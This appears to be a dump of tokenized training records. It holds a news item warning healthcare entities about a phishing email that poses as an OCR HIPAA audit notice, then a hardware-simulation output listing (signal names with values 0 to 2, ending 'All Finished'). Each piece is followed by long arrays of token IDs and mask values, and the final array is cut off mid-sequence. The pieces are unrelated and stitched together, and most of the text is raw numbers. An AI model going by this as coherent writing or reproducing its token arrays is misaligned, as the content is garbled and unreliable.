1, 1, 1, 1 ]
Phishing Email Disguised as OCR HIPAA Audit Notification A new phishing scam targeting covered entities (CE) and business associates (BA) is disguised as an official communication from the Office for Civil Rights (OCR). In an alert released November 28, OCR advised CEs and BAs that a phishing email is being circulated on fake HHS letterhead with the signature of Jocelyn Samuels, OCR’s director. The email directs recipients to click a link regarding the CE or BA’s inclusion in phase two of the HIPAA audit program. The link allegedly leads to a website marketing a private firm’s cybersecurity services, OCR said. The firm is not associated with OCR or the federal government. Individuals who have received the phishing email or are not certain an email from OCR is an official email should contact OCR at OSOCRAudit@hhs.gov. Phase two of the HIPAA audit program was announced in March. Phase two will consists of three rounds of audits: Desk audits of CEs Desk audits of BAs Comprehensive onsite audits of CEs and BAs Audited CEs had 10 days to submit requested documentation to auditors. Auditors will review the documentation and prepare a draft audit report. The draft report will be sent to the audited CE. The CE will be able to read to the draft report and attach comments. Auditors will then create the final report with the CE’s comments attached. Desk audits of CEs occurred in July but the program has stalled since then. Desk audits of BAs were originally set for October and comprehensive onsite audits were planned for early 2017. But the 160 audited CEs still have not received their draft audit reports and there is no sign when rounds two or three will begin, Chris Apgar, CISSP, president of Apgar and Associates, LLC, in Portland, Oregon, says. The recent presidential election may have put HIPAA audits on temporary hold. “I think all will be on hold until March or so next year because of the change in leadership at the top,” he says. In the meantime, CEs and BAs should remain alert for genuine OCR communications.
[ 1, 1963, 14424, 22608, 3295, 2543, 3368, 408, 438, 11341, 379, 5690, 6344, 8612, 277, 28578, 13, 13, 29909, 716, 1374, 14424, 885, 314, 3646, 292, 10664, 16212, 313, 4741, 29897, 322, 5381, 4067, 1078, 313, 5688, 29897, 338, 766, 2543, 3368, 408, 385, 6221, 12084, 515, 278, 11367, 363, 12886, 26863, 313, 29949, 11341, 467, 512, 385, 6655, 5492, 3979, 29871, 29906, 29947, 29892, 438, 11341, 594, 11292, 315, 14190, 322, 350, 2887, 393, 263, 1374, 14424, 4876, 338, 1641, 18342, 630, 373, 25713, 379, 14851, 5497, 2813, 411, 278, 12608, 310, 435, 542, 873, 29876, 3685, 29884, 1379, 29892, 438, 11341, 30010, 29879, 8881, 29889, 450, 4876, 1513, 29879, 23957, 10070, 304, 2828, 263, 1544, 11211, 278, 14645, 470, 350, 29909, 30010, 29879, 28694, 297, 8576, 1023, 310, 278, 379, 5690, 6344, 12990, 277, 1824, 29889, 450, 1544, 16831, 23244, 11981, 304, 263, 4700, 9999, 292, 263, 2024, 9226, 30010, 29879, 5094, 495, 8926, 5786, 29892, 438, 11341, 1497, 29889, 450, 9226, 338, 451, 6942, 411, 438, 11341, 470, 278, 17097, 5874, 29889, 13, 13, 2568, 23352, 29879, 1058, 505, 4520, 278, 1374, 14424, 4876, 470, 526, 451, 3058, 385, 4876, 515, 438, 11341, 338, 385, 6221, 4876, 881, 6958, 438, 11341, 472, 438, 6156, 29907, 4717, 566, 277, 29992, 29882, 9499, 29889, 13513, 29889, 13, 13, 4819, 559, 1023, 310, 278, 379, 5690, 6344, 12990, 277, 1824, 471, 9326, 297, 4779, 29889, 1963, 559, 1023, 674, 11624, 310, 2211, 364, 3885, 310, 12990, 1169, 29901, 13, 13, 4002, 29895, 12990, 1169, 310, 315, 14190, 2726, 29895, 12990, 1169, 310, 350, 2887, 422, 1457, 29882, 6270, 373, 2746, 12990, 1169, 310, 315, 14190, 322, 350, 2887, 13, 13, 29909, 566, 1573, 315, 14190, 750, 29871, 29896, 29900, 3841, 304, 9752, 13877, 5106, 304, 12990, 17259, 29889, 8612, 17259, 674, 9076, 278, 5106, 322, 19012, 263, 18195, 12990, 277, 3461, 29889, 450, 18195, 3461, 674, 367, 2665, 304, 278, 12990, 1573, 14645, 29889, 450, 14645, 674, 367, 2221, 304, 1303, 304, 278, 18195, 3461, 322, 10641, 6589, 29889, 8612, 17259, 674, 769, 1653, 278, 2186, 3461, 411, 278, 14645, 30010, 29879, 6589, 10959, 29889, 13, 13, 4002, 29895, 12990, 1169, 310, 315, 14190, 10761, 297, 5468, 541, 278, 1824, 756, 380, 4212, 1951, 769, 29889, 2726, 29895, 12990, 1169, 310, 350, 2887, 892, 10437, 731, 363, 5533, 322, 15171, 6270, 373, 2746, 12990, 1169, 892, 20458, 363, 4688, 29871, 29906, 29900, 29896, 29955, 29889, 1205, 278, 29871, 29896, 29953, 29900, 12990, 1573, 315, 14190, 1603, 505, 451, 4520, 1009, 18195, 12990, 277, 13676, 322, 727, 338, 694, 1804, 746, 364, 3885, 1023, 470, 2211, 674, 3380, 29892, 12821, 319, 4061, 279, 29892, 25781, 1799, 29925, 29892, 6673, 310, 319, 4061, 279, 322, 6853, 1078, 29892, 365, 12182, 29892, 297, 3371, 1049, 29892, 25203, 29892, 4083, 29889, 450, 7786, 6673, 616, 8271, 1122, 505, 1925, 379, 5690, 6344, 12990, 1169, 373, 13201, 4808, 29889, 13, 13, 30015, 29902, 1348, 599, 674, 367, 373, 4808, 2745, 4779, 470, 577, 2446, 1629, 1363, 310, 278, 1735, 297, 26001, 472, 278, 2246, 3995, 540, 4083, 29889, 13, 13, 797, 278, 6839, 603, 29892, 315, 14190, 322, 350, 2887, 881, 3933, 6655, 363, 29120, 457, 438, 11341, 7212, 800, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
i_chandle 0 i_string 0 i_bit 0 i_logic 0 i_chandle_t 0 i_string_t 0 i_bit_t 0 i_logic_t 0 i_array_2_state_1 0 i_array_2_state_32 0 i_array_2_state_33 0 i_array_2_state_64 0 i_array_2_state_65 0 i_array_2_state_128 0 i_struct_2_state_1 0 i_struct_2_state_32 0 i_struct_2_state_33 0 i_struct_2_state_64 0 i_struct_2_state_65 0 i_struct_2_state_128 0 i_union_2_state_1 0 i_union_2_state_32 0 i_union_2_state_33 0 i_union_2_state_64 0 i_union_2_state_65 0 i_union_2_state_128 0 i_array_4_state_1 0 i_array_4_state_32 0 i_array_4_state_33 0 i_array_4_state_64 0 i_array_4_state_65 0 i_array_4_state_128 0 i_struct_4_state_1 0 i_struct_4_state_32 0 i_struct_4_state_33 0 i_struct_4_state_64 0 i_struct_4_state_65 0 i_struct_4_state_128 0 i_union_4_state_1 0 i_union_4_state_32 0 i_union_4_state_33 0 i_union_4_state_64 0 i_union_4_state_65 0 i_union_4_state_128 0 e_chandle 0 e_string 0 e_bit 0 e_logic 0 e_chandle_t 0 e_string_t 0 e_bit_t 0 e_logic_t 0 e_array_2_state_1 0 e_array_2_state_32 0 e_array_2_state_33 0 e_array_2_state_64 0 e_array_2_state_65 0 e_array_2_state_128 0 e_struct_2_state_1 0 e_struct_2_state_32 0 e_struct_2_state_33 0 e_struct_2_state_64 0 e_struct_2_state_65 0 e_struct_2_state_128 0 e_union_2_state_1 0 e_union_2_state_32 0 e_union_2_state_33 0 e_union_2_state_64 0 e_union_2_state_65 0 e_union_2_state_128 0 e_array_4_state_1 0 e_array_4_state_32 0 e_array_4_state_33 0 e_array_4_state_64 0 e_array_4_state_65 0 e_array_4_state_128 0 e_struct_4_state_1 0 e_struct_4_state_32 0 e_struct_4_state_33 0 e_struct_4_state_64 0 e_struct_4_state_65 0 e_struct_4_state_128 0 e_union_4_state_1 0 e_union_4_state_32 0 e_union_4_state_33 0 e_union_4_state_64 0 e_union_4_state_65 0 e_union_4_state_128 0 i_chandle 1 i_string 1 i_bit 1 i_logic 1 i_chandle_t 1 i_string_t 1 i_bit_t 1 i_logic_t 1 i_array_2_state_1 1 i_array_2_state_32 1 i_array_2_state_33 1 i_array_2_state_64 1 i_array_2_state_65 1 i_array_2_state_128 1 i_struct_2_state_1 1 i_struct_2_state_32 1 i_struct_2_state_33 1 i_struct_2_state_64 1 i_struct_2_state_65 1 i_struct_2_state_128 1 i_union_2_state_1 1 i_union_2_state_32 1 i_union_2_state_33 1 i_union_2_state_64 1 i_union_2_state_65 1 i_union_2_state_128 1 i_array_4_state_1 1 i_array_4_state_32 1 i_array_4_state_33 1 i_array_4_state_64 1 i_array_4_state_65 1 i_array_4_state_128 1 i_struct_4_state_1 1 i_struct_4_state_32 1 i_struct_4_state_33 1 i_struct_4_state_64 1 i_struct_4_state_65 1 i_struct_4_state_128 1 i_union_4_state_1 1 i_union_4_state_32 1 i_union_4_state_33 1 i_union_4_state_64 1 i_union_4_state_65 1 i_union_4_state_128 1 e_chandle 1 e_string 1 e_bit 1 e_logic 1 e_chandle_t 1 e_string_t 1 e_bit_t 1 e_logic_t 1 e_array_2_state_1 1 e_array_2_state_32 1 e_array_2_state_33 1 e_array_2_state_64 1 e_array_2_state_65 1 e_array_2_state_128 1 e_struct_2_state_1 1 e_struct_2_state_32 1 e_struct_2_state_33 1 e_struct_2_state_64 1 e_struct_2_state_65 1 e_struct_2_state_128 1 e_union_2_state_1 1 e_union_2_state_32 1 e_union_2_state_33 1 e_union_2_state_64 1 e_union_2_state_65 1 e_union_2_state_128 1 e_array_4_state_1 1 e_array_4_state_32 1 e_array_4_state_33 1 e_array_4_state_64 1 e_array_4_state_65 1 e_array_4_state_128 1 e_struct_4_state_1 1 e_struct_4_state_32 1 e_struct_4_state_33 1 e_struct_4_state_64 1 e_struct_4_state_65 1 e_struct_4_state_128 1 e_union_4_state_1 1 e_union_4_state_32 1 e_union_4_state_33 1 e_union_4_state_64 1 e_union_4_state_65 1 e_union_4_state_128 1 i_chandle 2 i_string 2 i_bit 2 i_logic 2 i_chandle_t 2 i_string_t 2 i_bit_t 2 i_logic_t 2 i_array_2_state_1 2 i_array_2_state_32 2 i_array_2_state_33 2 i_array_2_state_64 2 i_array_2_state_65 2 i_array_2_state_128 2 i_struct_2_state_1 2 i_struct_2_state_32 2 i_struct_2_state_33 2 i_struct_2_state_64 2 i_struct_2_state_65 2 i_struct_2_state_128 2 i_union_2_state_1 2 i_union_2_state_32 2 i_union_2_state_33 2 i_union_2_state_64 2 i_union_2_state_65 2 i_union_2_state_128 2 i_array_4_state_1 2 i_array_4_state_32 2 i_array_4_state_33 2 i_array_4_state_64 2 i_array_4_state_65 2 i_array_4_state_128 2 i_struct_4_state_1 2 i_struct_4_state_32 2 i_struct_4_state_33 2 i_struct_4_state_64 2 i_struct_4_state_65 2 i_struct_4_state_128 2 i_union_4_state_1 2 i_union_4_state_32 2 i_union_4_state_33 2 i_union_4_state_64 2 i_union_4_state_65 2 i_union_4_state_128 2 e_chandle 2 e_string 2 e_bit 2 e_logic 2 e_chandle_t 2 e_string_t 2 e_bit_t 2 e_logic_t 2 e_array_2_state_1 2 e_array_2_state_32 2 e_array_2_state_33 2 e_array_2_state_64 2 e_array_2_state_65 2 e_array_2_state_128 2 e_struct_2_state_1 2 e_struct_2_state_32 2 e_struct_2_state_33 2 e_struct_2_state_64 2 e_struct_2_state_65 2 e_struct_2_state_128 2 e_union_2_state_1 2 e_union_2_state_32 2 e_union_2_state_33 2 e_union_2_state_64 2 e_union_2_state_65 2 e_union_2_state_128 2 e_array_4_state_1 2 e_array_4_state_32 2 e_array_4_state_33 2 e_array_4_state_64 2 e_array_4_state_65 2 e_array_4_state_128 2 e_struct_4_state_1 2 e_struct_4_state_32 2 e_struct_4_state_33 2 e_struct_4_state_64 2 e_struct_4_state_65 2 e_struct_4_state_128 2 e_union_4_state_1 2 e_union_4_state_32 2 e_union_4_state_33 2 e_union_4_state_64 2 e_union_4_state_65 2 e_union_4_state_128 2 *-* All Finished *-*
[ 1, 474, 29918, 305, 392, 280, 29871, 29900, 13, 29875, 29918, 1807, 29871, 29900, 13, 29875, 29918, 2966, 29871, 29900, 13, 29875, 29918, 19227, 29871, 29900, 13, 29875, 29918, 305, 392, 280, 29918, 29873, 29871, 29900, 13, 29875, 29918, 1807, 29918, 29873, 29871, 29900, 13, 29875, 29918, 2966, 29918, 29873, 29871, 29900, 13, 29875, 29918, 19227, 29918, 29873, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29872, 29918, 305, 392, 280, 29871, 29900, 13, 29872, 29918, 1807, 29871, 29900, 13, 29872, 29918, 2966, 29871, 29900, 13, 29872, 29918, 19227, 29871, 29900, 13, 29872, 29918, 305, 392, 280, 29918, 29873, 29871, 29900, 13, 29872, 29918, 1807, 29918, 29873, 29871, 29900, 13, 29872, 29918, 2966, 29918, 29873, 29871, 29900, 13, 29872, 29918, 19227, 29918, 29873, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29900, 13, 29872, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29900, 13, 29875, 29918, 305, 392, 280, 29871, 29896, 13, 29875, 29918, 1807, 29871, 29896, 13, 29875, 29918, 2966, 29871, 29896, 13, 29875, 29918, 19227, 29871, 29896, 13, 29875, 29918, 305, 392, 280, 29918, 29873, 29871, 29896, 13, 29875, 29918, 1807, 29918, 29873, 29871, 29896, 13, 29875, 29918, 2966, 29918, 29873, 29871, 29896, 13, 29875, 29918, 19227, 29918, 29873, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29875, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29875, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29875, 29918, 13094, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29872, 29918, 305, 392, 280, 29871, 29896, 13, 29872, 29918, 1807, 29871, 29896, 13, 29872, 29918, 2966, 29871, 29896, 13, 29872, 29918, 19227, 29871, 29896, 13, 29872, 29918, 305, 392, 280, 29918, 29873, 29871, 29896, 13, 29872, 29918, 1807, 29918, 29873, 29871, 29896, 13, 29872, 29918, 2966, 29918, 29873, 29871, 29896, 13, 29872, 29918, 19227, 29918, 29873, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29872, 29918, 13094, 29918, 29906, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29906, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29941, 29941, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29946, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29953, 29945, 29871, 29896, 13, 29872, 29918, 2378, 29918, 29946, 29918, 3859, 29918, 29896, 29906, 29947, 29871, 29896, 13, 29872, 29918, 4984, 29918, 29946, 29918, 3859, 29918, 29896, 29871, 29896, 13, 29872, 29918, 4984, 